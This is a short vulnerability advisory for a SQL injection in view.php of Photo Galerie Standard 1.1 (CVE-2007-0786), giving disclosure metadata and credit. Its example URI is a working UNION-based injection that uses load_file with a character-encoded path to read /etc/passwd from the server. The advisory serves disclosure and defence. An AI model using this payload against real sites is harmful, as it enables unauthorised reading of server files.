Photo Galerie View.PHP SQL Injection Vulnerability

Bugtraq ID:	22384
Class:	Input Validation Error
CVE:	CVE-2007-0786
Remote:	Yes
Local:	No
Published:	Feb 02 2007 12:00AM
Updated:	May 12 2015 07:34PM
Credit:	Ajann is credited with the discovery of this vulnerability.
Vulnerable:	Noname Media Photo Galerie Standard 1.1
Not Vulnerable:

Photo Galerie View.PHP SQL Injection Vulnerability

An attacker can exploit this issue via a web client.

An example URI is available:

http://www.example.com/view.php?id=-1%20union%20select%201,load_file(char((47,101,116,99,47,112,97,115,115,119,100)),3,4,0,0,0,0,0,0,0,0,0,0/*&categorie=8&next=1

Photo Galerie View.PHP SQL Injection Vulnerability

References:

• Photo Galerie Homepage (noname media)